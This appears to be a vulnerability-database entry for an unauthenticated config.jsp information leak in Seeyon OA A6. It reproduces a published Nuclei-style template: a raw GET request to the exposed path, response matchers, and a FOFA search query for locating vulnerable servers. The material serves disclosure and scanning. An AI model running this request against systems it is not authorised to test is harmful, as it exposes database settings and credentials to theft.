seeyon-config-exposure: Seeyon OA A6 config.jsp - Information Disclosure

日期: 2025-08-01 | 影响软件: Seeyon OA A6 | POC: 已公开

漏洞描述

The Seeyon OA A6 config.jsp page can be accessed without authorization, resulting in sensitive information leakage vulnerabilities, through which attackers can obtain sensitive information in the server

PoC代码[已公开]

id: seeyon-config-exposure

info:
  name: Seeyon OA A6 config.jsp - Information Disclosure
  author: SleepingBag945
  severity: medium
  description: |
    The Seeyon OA A6 config.jsp page can be accessed without authorization, resulting in sensitive information leakage vulnerabilities, through which attackers can obtain sensitive information in the server
  reference:
    - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E8%87%B4%E8%BF%9COA/%E8%87%B4%E8%BF%9COA%20A6%20config.jsp%20%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.md
    - https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/SeeyonController.java
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="yyoa" && app="致远互联-OA"
  tags: seeyon,oa,config,info-leak,vuln

http:
  - raw:
      - |
        GET /yyoa/ext/trafaxserver/SystemManage/config.jsp HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "DatabaseName="
          - "请在文本框内配置传真插件所需服务器的信息"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a0047304502205906ed540e91717df1f0297faa9a7dde023295b3d05a53b48974fc6a156c6e1a022100bcc0e986c1d4707f704d9f01b911ed1be2984d599dd559528250ec4f70699a74:922c64590222798bb761d5b6d8e72950

相关漏洞推荐